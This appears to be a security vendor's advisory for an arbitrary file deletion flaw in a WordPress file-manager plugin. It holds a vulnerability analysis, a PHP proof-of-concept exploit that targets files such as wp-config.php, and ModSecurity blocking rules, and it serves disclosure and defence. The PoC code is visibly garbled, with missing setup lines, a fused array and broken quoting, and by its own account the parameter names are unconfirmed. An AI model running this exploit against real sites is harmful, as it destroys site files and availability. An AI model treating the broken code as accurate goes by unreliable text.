CVE-2026-8095: Frontend File Manager Plugin <= 23.6 Authenticated (Subscriber+) Arbitrary File Deletion PoC, Patch Analysis & Rule

“`json
{
“analysis”: “Atomic Edge analysis of CVE-2026-8095 (metadata-based): This vulnerability allows authenticated attackers with Subscriber-level access to delete arbitrary files on the WordPress server. The flaw resides in the Frontend File Manager Plugin (slug: nmedia-user-file-uploader) version 23.6 and earlier. The CVSS score of 8.1 indicates high severity with impacts on integrity and availability.nnThe root cause is a case-sensitive bypass in the wpfm_file_meta_update AJAX handler. The plugin attempts to sanitize the wpfm_dir_path parameter by checking if it is set, but fails to account for case variations. By supplying WPFM_DIR_PATH in uppercase, the attacker bypasses the unset check. The value is later normalized to wpfm_dir_path by sanitize_key() during update_post_meta(), which overwrites the stored file path. This malicious path is then passed directly to unlink() in delete_file_locally() without any directory containment validation. This conclusion is inferred from the CWE (73: External Control of File Name or Path) and the detailed vulnerability description, as no source code diff is available.nnExploitation requires an authenticated session with Subscriber privileges. The attacker sends a POST request to /wp-admin/admin-ajax.php with the action parameter set to wpfm_file_meta_update. The request includes the WPFM_DIR_PATH (uppercase) parameter containing an absolute path to a target file, such as /var/www/html/wp-config.php. The plugin processes the request, overwrites the stored path, and triggers the delete_file_locally() function which calls unlink() on the supplied path. No nonce or additional authorization checks are mentioned, making this a direct exploitation path.nnRemediation requires implementing proper case-insensitive parameter handling and directory path validation. The plugin should use strict comparison functions that account for case variations, such as array_key_exists() with lowercase keys. Additionally, the plugin must validate that the final file path resides within the intended upload directory before passing it to unlink(). This should include realpath() resolution and strpos() checks to prevent directory traversal.nnSuccessful exploitation allows an attacker to delete critical files like wp-config.php, .htaccess, or index.php. Deleting wp-config.php breaks the database connection, rendering the site completely inaccessible. An attacker could delete the active theme’s index.php to cause further disruption. In a deployment where auto-prepend or auto-append files are configured, deletion of those files could lead to remote code execution if combined with other vulnerabilities. The ultimate impact is full site takeover through denial of service and potential privilege escalation.”,
poc_php”: “// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-8095 – Frontend File Manager Plugin ‘wpfm_file_meta_update’,n ‘WPFM_DIR_PATH’ => $target_file, // Uppercase parameter bypasses sanitizationn ‘file_id’ => 1 // Arbitrary file ID, may need adjustmentn);nncurl_setopt($ch, CURLOPT_URL, $ajax_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);n$response = curl_exec($ch);nn// Check responsen$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);necho ‘HTTP Response Code: . $http_code . PHP_EOL;necho ‘Response Body: ‘ . substr($response, 0, 500) . PHP_EOL;nnif ($http_code == 200 && strpos($response, ‘success’) !== false) {n echo ‘Exploit likely successful. File deletion attempted.’ . PHP_EOL;n} else {n echo ‘Exploit may have failed. Check error response.’ . PHP_EOL;n}nncurl_close($ch);nn// Note: This PoC assumes the AJAX action wpfm_file_meta_update and parameter WPFM_DIR_PATH are correct based on the CVE description. The file_id parameter may need to be a valid file ID owned by the attacker. No source code was available to confirm exact parameter names or required nonce handling.”,
modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-8095 (metadata-based)n# Blocks exploitation of arbitrary file deletion via case-sensitive bypassn# Targets the wpfm_file_meta_update AJAX handler with uppercase WPFM_DIR_PATH parameternnSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:20268095,phase:2,deny,status:403,chain,msg:’CVE-2026-8095 exploitation attempt via AJAX – Frontend File Manager Plugin file deletion’,severity:’CRITICAL’,tag:’CVE-2026-8095′”n SecRule ARGS_POST:action “@streq wpfm_file_meta_update” “chain”n SecRule ARGS_POST:WPFM_DIR_PATH “@rx ^/[a-zA-Z0-9_/-]+” \n “t:none”nn# Alternative: Also block if lowercase parameter contains path traversal patternsn# This second rule blocks attempts to use lowercase parameter with directory traversalnSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:20268096,phase:2,deny,status:403,chain,msg:’CVE-2026-8095 exploitation attempt via AJAX – directory traversal in file path’,severity:’CRITICAL’,tag:’CVE-2026-8095′”n SecRule ARGS_POST:action “@streq wpfm_file_meta_update” “chain”n SecRule ARGS_POST:wpfm_dir_path “@rx \.\./|.\.\\|\.\.%2f|\.\.%5c|\.\.\x00” \n “t:lowercase””
}
“`